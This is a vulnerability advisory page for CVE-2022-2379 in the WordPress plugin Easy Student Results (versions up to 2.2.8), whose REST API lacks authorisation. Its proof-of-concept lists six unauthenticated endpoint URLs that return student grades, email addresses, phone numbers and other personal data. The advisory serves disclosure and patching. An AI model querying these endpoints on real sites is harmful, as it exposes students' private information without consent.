Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbRaad Haddad of Cloudyrion GmbHWPVDB-ID:0773BA24-212E-41D5-9AE0-1416EA2C9DB6
HistoryJul 19, 2022 - 12:00 a.m.

Easy Student Results <= 2.2.8 - Sensitive Information Disclosure via REST API

2022-07-1900:00:00
Raad Haddad of Cloudyrion GmbH
wpscan.com
3

0.028 Low

EPSS

Percentile

90.8%

JSON

The plugin lacks authorisation in its REST API, allowing unauthenticated users to retrieve information related to the courses, exams, departments as well as student’s grades and PII such as email address, physical address, phone number etc

PoC

When the “Enable API for Mobile Apps” settings (/wp-admin/admin.php?page=rps_result_settings) is enabled https://example.com/wp-json/rps_result/v1/route/show_result?exam_record_id=2&amp;student;_id=32 https://example.com/wp-json/rps_result/v1/route/student_fields https://example.com/wp-json/rps_result/v1/route/search_student?department_id=1&amp;batch;_id=1&amp;semester;_id=1 https://example.com/wp-json/rps_result/v1/route/result_fields https://example.com/wp-json/rps_result/v1/route/list_results?exam_id=1&amp;department;_id=1&amp;batch;_id=1 https://example.com/wp-json/rps_result/v1/route/schema

CPENameOperatorVersion
easy-student-resultseq*

Related

patchstack 1
nvd 1
nuclei 1
cve 1
wpexploit 1
cvelist 1
prion 1
patchstack
patchstack
WordPress Easy Student Results plugin <= 2.2.8 - Sensitive Information Disclosure via REST API vulnerability
2022-07-19 00:00:00
nvd
nvd
CVE-2022-2379
2022-08-15 11:21:23
nuclei
nuclei
WordPress Easy Student Results <=2.2.8 - Improper Authorization
2022-11-09 14:18:37
cve
cve
CVE-2022-2379
2022-08-15 11:21:23
wpexploit
wpexploit
Easy Student Results <= 2.2.8 - Sensitive Information Disclosure via REST API
2022-07-19 00:00:00
cvelist
cvelist
CVE-2022-2379 Easy Student Results <= 2.2.8 - Sensitive Information Disclosure via REST API
2022-08-15 08:37:23
prion
prion
Design/Logic Flaw
2022-08-15 11:21:00

0.028 Low

EPSS

Percentile

90.8%

JSON
Related for WPVDB-ID:0773BA24-212E-41D5-9AE0-1416EA2C9DB6
patchstack1nvd1nuclei1cve1wpexploit1cvelist1prion1